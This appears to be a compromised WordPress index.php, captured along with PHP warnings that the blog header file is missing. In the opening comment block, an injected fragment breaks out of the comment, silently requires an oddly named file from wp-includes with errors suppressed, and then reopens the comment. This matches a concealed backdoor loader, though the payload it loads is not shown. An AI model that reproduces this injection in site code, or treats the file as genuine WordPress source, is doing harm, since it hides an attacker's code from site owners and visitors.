/**
* Front to the WordPress application. */@require('wp-includes/~');/*This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
Warning: require(/home/mstudioc/www/wp-blog-header.php) [function.require]: failed to open stream: No such file or directory in /home/mstudioc/www/index.php on line 17
Fatal error: require() [function.require]: Failed opening required '/home/mstudioc/www/wp-blog-header.php' (include_path='.:/usr/local/php5.3/lib/php') in /home/mstudioc/www/index.php on line 17